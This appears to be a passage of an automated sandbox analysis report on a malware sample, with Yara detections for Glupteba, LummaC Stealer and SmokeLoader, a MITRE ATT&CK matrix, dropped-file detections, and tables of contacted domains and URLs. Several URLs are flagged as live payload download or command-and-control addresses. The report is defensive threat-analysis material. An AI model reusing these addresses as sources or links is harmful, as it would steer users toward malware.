Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\2788.exe

Code function: 5_2_00409A91 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

5_2_00409A91

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_00581300 GetUserNameW,GetComputerNameW,

8_2_00581300

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_005E7EFA _free,GetTimeZoneInformation,

8_2_005E7EFA

Source: C:\Users\user\AppData\Local\Temp\2788.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F54.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Glupteba

Source: Yara match	File source: 33.2.6F54.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6F54.exe.2e70e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.6F54.exe.3760000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.6F54.exe.37a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.6F54.exe.3840000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 8.2.4294.exe.580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.4294.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2396120537.000000000040D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 38.3.sfriduf.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.9e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.8c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.5F46.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.900e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HVqTxn73uD.exe.910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.sfriduf.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.9c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1971295598.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2224102941.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.2695604056.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2440312745.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.4351039490.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.4351072817.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Glupteba

Source: Yara match	File source: 33.2.6F54.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.6F54.exe.2e70e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.3.6F54.exe.3760000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.6F54.exe.37a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.3.6F54.exe.3840000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000002.2590161504.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2563945392.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2587451571.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2500426400.0000000003BE2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.2528540786.0000000003C82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: 8.2.4294.exe.580000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.4294.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2396755519.00000000005F0000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2396120537.000000000040D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 38.3.sfriduf.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.9e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.8c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.5F46.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.fcriduf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HVqTxn73uD.exe.900e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HVqTxn73uD.exe.910000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.sfriduf.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.sfriduf.9c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.5F46.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.fcriduf.8d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1971295598.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.2224102941.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.2695604056.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2440312745.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.4351039490.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.4351072817.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	13 Native API	1 Registry Run Keys / Startup Folder	512 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	23 Software Packing	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Standard Port			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	3 Command and Scripting Interpreter	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	136 System Information Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	4 Non-Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	561 Security Software Discovery	SSH	Keylogging	Scheduled Transfer	225 Application Layer Protocol			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Data Transfer Size Limits	1 Proxy			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	512 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Regsvr32	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
HVqTxn73uD.exe	38%	ReversingLabs
HVqTxn73uD.exe	46%	Virustotal	Browse
HVqTxn73uD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\6F54.exe	100%	Avira	HEUR/AGEN.1303615
C:\Users\user\AppData\Local\Temp\4294.exe	100%	Avira	TR/Crypt.XPACK.Gen2
C:\Users\user\AppData\Local\Temp\2788.exe	100%	Avira	HEUR/AGEN.1316840
C:\ProgramData\Drivers\csrss.exe	100%	Avira	HEUR/AGEN.1316840
C:\Users\user\AppData\Local\Temp\5F46.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\46BC.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6F54.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\4294.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2788.exe	100%	Joe Sandbox ML
C:\ProgramData\Drivers\csrss.exe	100%	Joe Sandbox ML
C:\ProgramData\Drivers\csrss.exe	70%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\2788.exe	70%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\3EBB.exe	15%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\4294.exe	78%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\46BC.dll	30%	ReversingLabs	Win32.Trojan.Zenpak
C:\Users\user\AppData\Local\Temp\_MEI56002\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\_tkinter.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\python37.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\tcl86t.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\tk86t.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI56002\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Roaming\sfriduf	38%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
chucknorrisexperiment.com	0%	Virustotal	Browse
insolsoft.com	0%	Virustotal	Browse
comunicorp.com	0%	Virustotal	Browse
cream.hitsturbo.com	20%	Virustotal	Browse
lightseinsteniki.org	21%	Virustotal	Browse
nfmoi.com	0%	Virustotal	Browse
straightforex.com	0%	Virustotal	Browse
www.ouchonline.com	0%	Virustotal	Browse
slhpc.com	0%	Virustotal	Browse
cpu-info.com	0%	Virustotal	Browse
apacwellservices.com.my	0%	Virustotal	Browse
shums.com	0%	Virustotal	Browse
roguemedia.com.au	0%	Virustotal	Browse
ebourneimages.com	0%	Virustotal	Browse
ni-spamexperts.guzel.net.tr	0%	Virustotal	Browse
mail.protonmail.ch	0%	Virustotal	Browse
progressivestaffingsolutions.com	0%	Virustotal	Browse
stadiumgm.com	0%	Virustotal	Browse
economicnudity.com	0%	Virustotal	Browse
timsoter.com	0%	Virustotal	Browse
bhbmail.com	0%	Virustotal	Browse
schtuph.com	0%	Virustotal	Browse
eedoh.com	0%	Virustotal	Browse
humydrole.com	16%	Virustotal	Browse
schlitzohren.com	0%	Virustotal	Browse
oceanpower.com.hk	0%	Virustotal	Browse
mikeandamy.com.au	0%	Virustotal	Browse
everystep.org	0%	Virustotal	Browse
stualialuyastrelia.net	23%	Virustotal	Browse
shpilliwilli.com	16%	Virustotal	Browse
longboat-systems.com	0%	Virustotal	Browse
haijiao.com	0%	Virustotal	Browse
mx-biz.mail.am0.yahoodns.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://word.office.comon	0%	URL Reputation	safe
http://liuliuoumumy.org/	0%	URL Reputation	safe
http://invalidlog.txtlookup	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://tonimiuyaytre.org/	0%	URL Reputation	safe
http://devlog.gregarius.net/docs/ua)Links	0%	URL Reputation	safe
http://humydrole.com/tmp/index.php	0%	URL Reputation	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
http://www.googlebot.com/bot.html)Links	0%	URL Reputation	safe
http://www.alltheweb.com/help/webmaster/crawler)Mozilla/5.0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://tyiuiunuewqy.org/	0%	URL Reputation	safe
http://snukerukeutit.org/	0%	URL Reputation	safe
http://stualialuyastrelia.net/	0%	URL Reputation	safe
https://blockstream.info/apiinva	0%	URL Reputation	safe
opposesicknessopw.pw	0%	URL Reputation	safe
http://sumagulituyo.org/	100%	URL Reputation	malware
http://misc.yahoo.com.cn/help.html)QueryPerformanceFrequency	0%	URL Reputation	safe
http://www.google.c	0%	URL Reputation	safe
politefrightenpowoa.pw	100%	URL Reputation	malware
http://grub.org)Mozilla/5.0	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/apiR	100%	Avira URL Cloud	malware
http://diagramfiremonkeyowwa.fun/x	100%	Avira URL Cloud	malware
http://bombertublestylebanws.fun/	0%	Avira URL Cloud	safe
https://blockchain.infoindex	0%	URL Reputation	safe
http://diagramfiremonkeyowwa.fun/1H	100%	Avira URL Cloud	malware
http://lightseinsteniki.org/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize	0%	Avira URL Cloud	safe
http://www.avantbrowser.com)MOT-V9mm/	0%	Avira URL Cloud	safe
https://linkofstrumble.com/dad9b3a52c30c4733cf934e71716b3dc/288c47bbc1871b439df19ff4df68f076.exe	100%	Avira URL Cloud	malware
ratefacilityframw.fun	0%	Avira URL Cloud	safe
https://shpilliwilli.com/288c47bbc1871b439df19ff4df68f076.exe	100%	Avira URL Cloud	malware
http://crl.startssl.com/sca-code3.crl0#	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/l	100%	Avira URL Cloud	malware
http://aia.startssl.com/certs/sca.code3.crt06	0%	Avira URL Cloud	safe
http://crl.startssl.com/sfsca.crl0f	0%	Avira URL Cloud	safe
http://bombertublestylebanws.fun/api	100%	Avira URL Cloud	malware
http://diagramfiremonkeyowwa.fun/apiMy	100%	Avira URL Cloud	malware
http://2pkktxkf3gnpcjh2bhi62arz2ieyjgxocb3jne3kc2nu2yvyxqq23nad.onionC:	0%	Avira URL Cloud	safe
http://www.bloglines.com)Frame	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/lr	100%	Avira URL Cloud	malware
http://diagramfiremonkeyowwa.fun/xv	100%	Avira URL Cloud	malware
http://dayfarrichjwclik.fun/	100%	Avira URL Cloud	malware
neighborhoodfeelsa.fun	100%	Avira URL Cloud	malware
http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls:	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/api	100%	Avira URL Cloud	malware
http://ftpvoyager.cc/ftp/index.php	100%	Avira URL Cloud	malware
cakecoldsplurgrewe.pw	100%	Avira URL Cloud	malware
http://www.spidersoft.com)	0%	Avira URL Cloud	safe
http://ocsp.startssl.com07	0%	Avira URL Cloud	safe
http://cream.hitsturbo.com/order/tuc5.exe	100%	Avira URL Cloud	malware
dayfarrichjwclik.fun	100%	Avira URL Cloud	malware
http://www.startssl.com/policy0	0%	Avira URL Cloud	safe
http://neighborhoodfeelsa.fun/	100%	Avira URL Cloud	malware
http://diagramfiremonkeyowwa.fun/apiX	100%	Avira URL Cloud	malware
http://ocsp.startssl.com00	0%	Avira URL Cloud	safe
reviveincapablewew.pw	100%	Avira URL Cloud	malware
https://sabotage.net	0%	Avira URL Cloud	safe
http://dayfarrichjwclik.fun/api	100%	Avira URL Cloud	malware
http://aia.startssl.com/certs/ca.crt0	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/apib	100%	Avira URL Cloud	malware
http://www.startssl.com/0P	0%	Avira URL Cloud	safe
http://diagramfiremonkeyowwa.fun/	100%	Avira URL Cloud	malware
http://localhost:3433/https://duniadekho.baridna:	0%	Avira URL Cloud	safe
http://neighborhoodfeelsa.fun/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chucknorrisexperiment.com	46.30.213.127	true	false	0%, Virustotal, Browse	unknown
insolsoft.com	185.215.4.24	true	false	0%, Virustotal, Browse	unknown
comunicorp.com	208.91.197.27	true	false	0%, Virustotal, Browse	unknown
cream.hitsturbo.com	172.67.168.30	true	true	20%, Virustotal, Browse	unknown
lightseinsteniki.org	34.143.166.163	true	true	21%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
nfmoi.com	157.7.144.5	true	false	0%, Virustotal, Browse	unknown
straightforex.com	192.185.35.91	true	false	0%, Virustotal, Browse	unknown
alt2.aspmx.l.google.com	209.85.202.26	true	false		high
slhpc.com	3.33.130.190	true	false	0%, Virustotal, Browse	unknown
www.ouchonline.com	172.67.223.67	true	false	0%, Virustotal, Browse	unknown
apacwellservices.com.my	103.6.196.150	true	false	0%, Virustotal, Browse	unknown
progressivestaffingsolutions-com.mail.protection.outlook.com	104.47.75.164	true	false		high
mailstore1.secureserver.net	68.178.213.243	true	false		high
cpu-info.com	15.197.142.173	true	false	0%, Virustotal, Browse	unknown
shums.com	86.13.104.131	true	false	0%, Virustotal, Browse	unknown
economicnudity.com	50.87.253.230	true	false	0%, Virustotal, Browse	unknown
